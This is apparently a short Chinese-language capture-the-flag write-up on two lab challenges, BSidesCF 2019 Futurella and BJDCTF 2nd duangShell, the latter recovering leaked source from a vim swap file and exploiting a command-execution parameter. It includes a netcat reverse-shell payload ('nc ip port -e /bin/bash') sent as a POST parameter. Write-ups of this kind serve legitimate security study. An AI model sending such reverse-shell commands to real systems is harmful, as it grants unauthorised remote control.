文章目录
- [BSidesCF 2019]Futurella
- [BJDCTF 2nd]duangShell
-
- 反弹姿势1(未成功)
- 反弹姿势2
[BSidesCF 2019]Futurella
好久没看过这么简单的题目了,哇哇哇
整了个火星文,看不懂查看源代码
[BJDCTF 2nd]duangShell
点进去发现是swp源码泄露
利用vim -r index.php.swp
恢复文件
这里我知道了exec函数与system类似但是没有回显,所以我传入的参数girl_friend=print_r(scandir(dirname(__FILE__)))
会没有显示
看了别人的wp,发现我们只能用反弹shell的方法了,根据提示
由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做,这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务,利用xshell连接主机
反弹姿势1(未成功)
开启
反弹shell
不知道为啥通不了迷惑???
反弹姿势2
post参数:nc ip port -e /bin/bash
这个靶机真垃圾